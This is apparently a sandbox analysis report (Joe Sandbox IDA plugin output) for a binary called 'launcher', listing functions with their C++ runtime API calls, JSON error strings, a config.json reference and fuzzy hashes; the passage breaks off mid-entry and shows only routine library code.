Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Min_valuememcpy$allocator
String ID:
API String ID: 1321473536-0
Opcode ID: 9de963a9302c028c1ddf24e6a2bf15bf6df0f56bf30ff666085f9a238234f1de
Instruction ID: 1e317ddcdd86fe40f0104a927adace46c8673b6c3714ea18ac23b150279daa2b
Opcode Fuzzy Hash: 9de963a9302c028c1ddf24e6a2bf15bf6df0f56bf30ff666085f9a238234f1de
Instruction Fuzzy Hash: BE31A263634B9585D620AF26E4000A9B7A0FB48FD8BA48232DF9C07799DE3CE512C750

Function 00007FF77E0947C0 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77E09FF40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF77E09F7B7), ref: 00007FF77E09FF5A

char_traits.LIBCPMTD ref: 00007FF77E094835
??0_Locinfo@std@@QEAA@PEBD@Z.MSVCP140 ref: 00007FF77E0948E1
??0facet@locale@std@@IEAA@_K@Z.MSVCP140 ref: 00007FF77E0948F9
?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@@XZ.MSVCP140 ref: 00007FF77E094912
??1_Locinfo@std@@QEAA@XZ.MSVCP140 ref: 00007FF77E094934

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Locinfo@std@@$??0_??0facet@locale@std@@??1_Collvec@@Getcoll@_char_traitsmalloc
String ID:
API String ID: 2161808276-0
Opcode ID: dd9d2a9225ce9a5144f08c6a551dcba83ec95826b01e3c7c922850793231e005
Instruction ID: b23a34ea9b3a30a5d5370c082e272c763e01674e18217ef6a027d8e70c1e8985
Opcode Fuzzy Hash: dd9d2a9225ce9a5144f08c6a551dcba83ec95826b01e3c7c922850793231e005
Instruction Fuzzy Hash: B141AF23A38A8241EA20EF15E4513FAA361FBD5754FA45231DB8D036A6EF3CE545C720

Function 00007FF77E099210 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

_Min_value.LIBCPMTD ref: 00007FF77E099266
_Min_value.LIBCPMTD ref: 00007FF77E09929E
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00000001), ref: 00007FF77E099304
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00000001), ref: 00007FF77E099317
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E099362

Part of subcall function 00007FF77E081230: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF77E09FF7B,?,?,?), ref: 00007FF77E081274

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Min_valuememcpy$Concurrency::cancel_current_task__std_exception_copy
String ID:
API String ID: 2247076679-0
Opcode ID: ab56c823c47ef533f41494d4a76a7d85cfba67be9258f7518c7d19583b190622
Instruction ID: 9c02376e0a7c619e4f79aebd7fb8613930b24a9bff2040f44866dd83c7e64d8c
Opcode Fuzzy Hash: ab56c823c47ef533f41494d4a76a7d85cfba67be9258f7518c7d19583b190622
Instruction Fuzzy Hash: EE318D23734A8994DA20EF65E4041B9A364F748BE8FA88732DEAD477D9DE3CE545C310

Function 00007FF77E08B460 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

_Max_value.LIBCPMTD ref: 00007FF77E08B4CD
_Min_value.LIBCPMTD ref: 00007FF77E08B4EC
memcpy.VCRUNTIME140 ref: 00007FF77E08B55F
memcpy.VCRUNTIME140 ref: 00007FF77E08B581
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E08B5BF

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_taskMax_valueMin_value
String ID:
API String ID: 76404066-0
Opcode ID: 70848865602531a21b88008a84d403075b650ffb9928410c49103c6121a44d69
Instruction ID: 5399836b9c564b9881bc6183d141e73882fc0bf7f8d31c7b3f96beff51461306
Opcode Fuzzy Hash: 70848865602531a21b88008a84d403075b650ffb9928410c49103c6121a44d69
Instruction Fuzzy Hash: 52319E37638B8186EA10EF11E4552A9B361FB84BD0FA44232EB9D47B99DF3CE155CB10

Function 00007FF77E0865B0 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

_Max_value.LIBCPMTD ref: 00007FF77E086617
_Min_value.LIBCPMTD ref: 00007FF77E086636
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00007FF77E0863F2), ref: 00007FF77E08666A

Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E0949B6
Part of subcall function 00007FF77E094970: _Min_value.LIBCPMTD ref: 00007FF77E0949D5
Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E094A13

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00007FF77E0863F2), ref: 00007FF77E0866A6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E0866D4

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Max_value$Min_valuememcpy$Concurrency::cancel_current_task
String ID:
API String ID: 2541795887-0
Opcode ID: 229846efd6264bc6c8c30623f187485d0e88fe097286888e10700ed387c8a909
Instruction ID: 90b08c1f1f16f1d41d995345cbed3ae2988960c5b7b2f8691e1a4ea045437b59
Opcode Fuzzy Hash: 229846efd6264bc6c8c30623f187485d0e88fe097286888e10700ed387c8a909
Instruction Fuzzy Hash: 67319433638B8185E620EF11F4403A9B361FB94B94FA44231EA9D47799DF3CE561C750

Function 000001EDF1671EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001EDF1671EE0
_set_statfp.LIBCMT ref: 000001EDF1671EFB
_set_statfp.LIBCMT ref: 000001EDF1671F17
_set_statfp.LIBCMT ref: 000001EDF1671F53

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 3ef8987dca683846f96e760e9ffe02583edc41f8cf7f38ed6e670e0127e76ac1
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4A114C32A54A9102F6A8917CF9563ED11D17B76374F18472AEE77062D78F5CCD434200

Function 000001EDF16412B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001EDF16412E0
_set_statfp.LIBCMT ref: 000001EDF16412FB
_set_statfp.LIBCMT ref: 000001EDF1641317
_set_statfp.LIBCMT ref: 000001EDF1641353

Memory Dump Source

Source File: 00000006.00000002.3728534436.000001EDF1630000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001EDF1630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1630000_launcher.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: ae65865a4d336fce0583a13e21680635e8881c70efccce560f19f89f2a4ef597
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4111E132A54EF441F6A691B9F4523ED10C0AB57374F484624AE7B46FDB8B28EF834204

Function 000001EDF16384F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EDF1638503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001EDF1638598

Strings

f, xrefs: 000001EDF1638516
csm, xrefs: 000001EDF163857E

Memory Dump Source

Source File: 00000006.00000002.3728534436.000001EDF1630000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001EDF1630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1630000_launcher.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 6a52d9674f1ecae5741367fb62c5ac5970c6b4f2ba26e46d4da11528f6a87ccb
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 1651AB722126A08AEB54CF36F844BDC33D9F352B98F518224DE074378BEB36C9829704

Function 00007FF77E092010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E09205A

Part of subcall function 00007FF77E087780: char_traits.LIBCPMTD ref: 00007FF77E0878B8
Part of subcall function 00007FF77E087780: char_traits.LIBCPMTD ref: 00007FF77E0878F4

char_traits.LIBCPMTD ref: 00007FF77E0920A1

Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087635
Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087694

Part of subcall function 00007FF77E095760: char_traits.LIBCPMTD ref: 00007FF77E095806
Part of subcall function 00007FF77E095760: char_traits.LIBCPMTD ref: 00007FF77E09583D

__std_exception_copy.VCRUNTIME140 ref: 00007FF77E09218C

Strings

parse_error, xrefs: 00007FF77E09209A, 00007FF77E0920A9

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$__std_exception_copy
String ID: parse_error
API String ID: 926054189-3903021949
Opcode ID: 10d80ac74e4d04134a1ac29de332013e75c1add1f6c8e64e58cd5bd52d1161ec
Instruction ID: a884a9b75b6eacf65d7f73556638b22adc04574f85063eb0bcd0d997e3076bf7
Opcode Fuzzy Hash: 10d80ac74e4d04134a1ac29de332013e75c1add1f6c8e64e58cd5bd52d1161ec
Instruction Fuzzy Hash: D4415323639B8595D660EB10F8507EAB760FB95340FE18531D6CD43669EF3CE589C720

Function 00007FF77E097EE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E097F21
char_traits.LIBCPMTD ref: 00007FF77E097F52

Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087635
Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087694

__std_exception_copy.VCRUNTIME140 ref: 00007FF77E098007

Strings

invalid_iterator, xrefs: 00007FF77E097F4B, 00007FF77E097F5A

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$__std_exception_copy
String ID: invalid_iterator
API String ID: 926054189-2508626007
Opcode ID: 21549f365f5bfa943d7ab4d31fe83367e2727a96c1100e674d16def46ce92529
Instruction ID: d51fe6e8fb440fc597e97a81e89a85d3f9b74ba234569ca0e6ddf58444de086e
Opcode Fuzzy Hash: 21549f365f5bfa943d7ab4d31fe83367e2727a96c1100e674d16def46ce92529
Instruction Fuzzy Hash: 90313223638B46A5D620EB50F4502EAB760FFD5340FE05132D6CD426A5EE2CF689C760

Function 00007FF77E093330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E093371
char_traits.LIBCPMTD ref: 00007FF77E0933A2

Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087635
Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087694

__std_exception_copy.VCRUNTIME140 ref: 00007FF77E09345E

Strings

type_error, xrefs: 00007FF77E09339B, 00007FF77E0933AA

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$__std_exception_copy
String ID: type_error
API String ID: 926054189-1406221190
Opcode ID: 2353c173a473e492ccbe1db47578565317f631d2dc833a53fca1ce074880d550
Instruction ID: ee7b79ed4d5ea997cfa3cd1d9bd05311100d9b2525551abd4d97ff3d512cddcd
Opcode Fuzzy Hash: 2353c173a473e492ccbe1db47578565317f631d2dc833a53fca1ce074880d550
Instruction Fuzzy Hash: 61412123638B85A5DA10EB10E4502EAB760FB95344FE05532E68C43A69EF3CF695C760

Function 00007FF77E09F390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E09F3D1
char_traits.LIBCPMTD ref: 00007FF77E09F402

Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087635
Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087694

__std_exception_copy.VCRUNTIME140 ref: 00007FF77E09F4BE

Strings

type_error, xrefs: 00007FF77E09F3FB, 00007FF77E09F40A

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$__std_exception_copy
String ID: type_error
API String ID: 926054189-1406221190
Opcode ID: 08b138a1ff98b2415cf4e4566ed6817b9939895c08960490fc0fc3bc8abefe0a
Instruction ID: 8f9a0a038a752142f542d05d89e835143b4bf9509293afe2c70be002eca0baf9
Opcode Fuzzy Hash: 08b138a1ff98b2415cf4e4566ed6817b9939895c08960490fc0fc3bc8abefe0a
Instruction Fuzzy Hash: 25413223638B85A5DA10FB10E4502EAB760FB95344FE05532E6CC43A69EF3CF695C760

Function 00007FF77E0955E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E095621
char_traits.LIBCPMTD ref: 00007FF77E095652

Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087635
Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087694

__std_exception_copy.VCRUNTIME140 ref: 00007FF77E09570E

Strings

out_of_range, xrefs: 00007FF77E09564B, 00007FF77E09565A

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$__std_exception_copy
String ID: out_of_range
API String ID: 926054189-3053435996
Opcode ID: c66b610fe0e14a45d70b2e36106a60bf8b581ede49bbd2b5c33705c84e7520f5
Instruction ID: 011dc038c2d47149cad0b84872f90d566ffc642b0905b9cd6c57cabd2138f37b
Opcode Fuzzy Hash: c66b610fe0e14a45d70b2e36106a60bf8b581ede49bbd2b5c33705c84e7520f5
Instruction Fuzzy Hash: 4F413523639B86A5D610FB10E4502EAB760FB95384FD05532D6CC43AA5EF3CF695C760

Function 00007FF77E093650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E093691
char_traits.LIBCPMTD ref: 00007FF77E0936C2

Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087635
Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087694

__std_exception_copy.VCRUNTIME140 ref: 00007FF77E09377E

Strings

other_error, xrefs: 00007FF77E0936BB, 00007FF77E0936CA

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$__std_exception_copy
String ID: other_error
API String ID: 926054189-896093151
Opcode ID: a990f0fca7009190692a47eca67ee61844610c93b286547d6af852b2065164cb
Instruction ID: 6a5026ee7f16621cd76fc2bcc3be901c3eace6f6649e2f34c490dffceefc2a1c
Opcode Fuzzy Hash: a990f0fca7009190692a47eca67ee61844610c93b286547d6af852b2065164cb
Instruction Fuzzy Hash: 3F413423639B86A5D610EB10E4502EAB760FBD5384FD05532E6CC43A69EF3CF699C760

Function 000001EDF16384D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EDF1638503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001EDF1638598

Strings

f, xrefs: 000001EDF1638516
csm, xrefs: 000001EDF163857E

Memory Dump Source

Source File: 00000006.00000002.3728534436.000001EDF1630000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001EDF1630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1630000_launcher.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 2d645b164393f37941280d64e3f53f12abd3b84bc5bec318b0f2d99f4c57d14c
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: EB317872211690CAE754DB26F8447DD37E8F742BA8F158218AE4B4778BCB3AC982C704

Function 00007FF77E090480 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF77E0904BF
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF77E0904E3
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF77E090541

Strings

use_mobile_platform -is_cloud 1 -platform_type CLOUD_THIRD_PARTY_MOBILE, xrefs: 00007FF77E09048F

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
String ID: use_mobile_platform -is_cloud 1 -platform_type CLOUD_THIRD_PARTY_MOBILE
API String ID: 1362866461-725445252
Opcode ID: a1b6ea6bdfedd18b0bc4a3b7b22e92ad9a27f09357ef7587580926ccada8a7bd
Instruction ID: d4cdc79d04f4e29d181ec63062ed5dc4eb1a8fbafdf683f20d548f14564fccd4
Opcode Fuzzy Hash: a1b6ea6bdfedd18b0bc4a3b7b22e92ad9a27f09357ef7587580926ccada8a7bd
Instruction Fuzzy Hash: E6215733629B8586DB14EF55E68066EBB60FB85B89F948031DB0D43B60DF3CE5A5C710

Function 00007FF77E093240 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77E08B6C0: allocator.LIBCONCRTD ref: 00007FF77E08B77B

char_traits.LIBCPMTD ref: 00007FF77E0932A4
char_traits.LIBCPMTD ref: 00007FF77E0932DB

Strings

: 0x, xrefs: 00007FF77E0932D4, 00007FF77E0932E3
invalid UTF-8 byte at index , xrefs: 00007FF77E09329D, 00007FF77E0932AC

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$allocator
String ID: : 0x$invalid UTF-8 byte at index
API String ID: 132031878-1231261809
Opcode ID: 18cb65499108bf75820c56d50320b0c7fd2ce5c2b4059beaf98694504ca744b4
Instruction ID: fff635e4c0c8f2723414d623f8b45b0d57f3cdc43acf202c4816de700e84196e
Opcode Fuzzy Hash: 18cb65499108bf75820c56d50320b0c7fd2ce5c2b4059beaf98694504ca744b4
Instruction Fuzzy Hash: 5A214C6263879191E600FB12D4040ADE765FB95BC0F904432EE8D17B9ACF7CF156C760

Function 00007FF77E08A6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF77E08A720
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF77E08A744

Part of subcall function 00007FF77E083970: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,00000000,?,use_mobile_platform -is_cloud 1 -platform_type CLOUD_THIRD_PARTY_MOBILE,00007FF77E088238), ref: 00007FF77E08397E

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF77E08A7AA

Strings

config.json, xrefs: 00007FF77E08A784

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
String ID: config.json
API String ID: 2695135154-1058386122
Opcode ID: 968243078c40e10867e4de63eccb85ee393b3a09ce00fb51caa253e39107af3a
Instruction ID: 490b7ae5c4a3fc37d840f2a3eea1fe5ae33abe241808c525d94d50b733969f2e
